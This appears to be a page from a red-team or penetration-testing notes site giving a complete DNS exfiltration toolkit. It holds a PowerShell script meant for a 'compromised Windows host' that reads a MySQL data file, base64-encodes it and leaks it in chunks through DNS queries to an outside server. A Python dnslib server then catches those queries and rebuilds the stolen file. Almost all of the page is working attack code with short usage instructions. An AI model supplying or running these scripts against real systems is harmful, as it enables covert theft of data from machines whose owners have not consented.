DNS

Exfiltrate a file using an external DNS server

# Run this PowerShell script on the compromised Windows host, change the $filePath, $domain and $dnsServer variables accordingly.
$filePath = "C:\xampp\mysql\data\mysql\user.frm"

if (Test-Path $filePath) {
    $fileBytes = [System.IO.File]::ReadAllBytes($filePath)
    $encoded = [Convert]::ToBase64String($fileBytes)
    $chunks = $encoded -split '(.{50})' | Where-Object { $_ }
    $domain = "yourdomain.com"
    $dnsServer = "192.0.2.1"  # Replace with the IP address of your DNS server
    $sessionId = (Get-Date -Format "yyyyMMddHHmmss")
    $i = 0
    foreach ($chunk in $chunks) {
        $label = "{0:D4}" -f $i
        $query = "$label.$chunk.$sessionId.$domain"
        try {
            Resolve-DnsName -Name $query -Type A -Server $dnsServer | Out-Null
        } catch {}
        Start-Sleep -Milliseconds 100
        $i++
    }
    Write-Host "Exfiltration simulation complete for file: $filePath"
} else {
    Write-Host "File not found: $filePath"
}

Host the following Python script on an externally available DNS server

# After script completion, type quit and the file should be available in ASCII
from dnslib.server import DNSServer, BaseResolver
from dnslib import DNSRecord, RR, QTYPE, A
import base64
import datetime
import os

class ExfilResolver(BaseResolver):
    def __init__(self):
        self.sessions = {}

    def resolve(self, request, handler):
        qname = str(request.q.qname)
        parts = qname.strip('.').split('.')

        if len(parts) < 4:
            return request.reply()

        try:
            index = int(parts[0])
            chunk = parts[1]
            session_id = parts[2]
            # domain = '.'.join(parts[3:])  # Not used here, but could be logged
        except (ValueError, IndexError):
            return request.reply()

        if session_id not in self.sessions:
            self.sessions[session_id] = {}

        self.sessions[session_id][index] = chunk

        reply = request.reply()
        reply.add_answer(RR(rname=request.q.qname, rtype=QTYPE.A, rclass=1, ttl=1, rdata=A("127.0.0.1")))
        return reply

    def dump_sessions(self):
        for session_id, chunks in self.sessions.items():
            sorted_chunks = [chunks[i] for i in sorted(chunks.keys())]
            b64_data = ''.join(sorted_chunks)

            # Fix Base64 padding
            missing_padding = len(b64_data) % 4
            if missing_padding:
                b64_data += '=' * (4 - missing_padding)

            try:
                decoded = base64.b64decode(b64_data)
                output_file = f"exfil_{session_id}.bin"
                with open(output_file, "wb") as f:
                    f.write(decoded)
                print(f"[+] Session {session_id} written to {output_file}")
            except Exception as e:
                print(f"[!] Failed to decode session {session_id}: {e}")

if __name__ == "__main__":
    resolver = ExfilResolver()
    server = DNSServer(resolver, port=53, address="0.0.0.0", tcp=False)
    print("[*] Listening for DNS queries on UDP port 53...")
    try:
        server.start_thread()
        while True:
            cmd = input("Type 'dump' to reconstruct files or 'exit' to quit:\n> ").strip().lower()
            if cmd == "dump":
                resolver.dump_sessions()
            elif cmd == "exit":
                break
    except KeyboardInterrupt:
        print("\n[!] Interrupted.")

PreviousCertutil NextLinux

Last updated 7 months ago